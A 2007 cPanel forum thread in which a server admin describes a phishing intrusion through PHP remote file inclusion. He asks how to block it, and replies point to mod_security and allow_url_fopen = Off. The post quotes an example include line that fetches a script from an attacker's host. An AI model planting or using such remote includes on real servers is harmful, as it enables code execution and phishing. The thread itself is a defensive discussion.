Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Avoiding remote PHP includes()

Discussion in 'General Discussion' started by Heritz, May 13, 2007.

  1. Heritz

    Heritz Well-Known Member

    Joined:
    Aug 12, 2006
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    156
    Hi all,

    Recently my company server has been attacked by phishers who are using a website vulnerabilty to upload files and get bank accounts information. We have been contacted by the bank and we fixed the problem within the website but I still got a question:

    The hack attempt was done using the remote include ability of PHP, I mean they exploded the include() function using something like include('http://myhackingwebsite.com/script.txt'); and then they uploaded the phishing files using system commands.

    I denied the system commands in my php.ini but I would also like to know how to avoid remote includes on PHP. I have enabled the open_basedir for all the sites, but as far as I know, open_basedir only affects file management functions, not includes.

    Any suggestion? Thanks in advance!
     
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    16,585
    Likes Received:
    440
    Trophy Points:
    583
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    mod_security?
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. flash7

    flash7 Well-Known Member

    Joined:
    Feb 16, 2004
    Messages:
    201
    Likes Received:
    0
    Trophy Points:
    166
    php.ini

    ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
    allow_url_fopen = Off
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice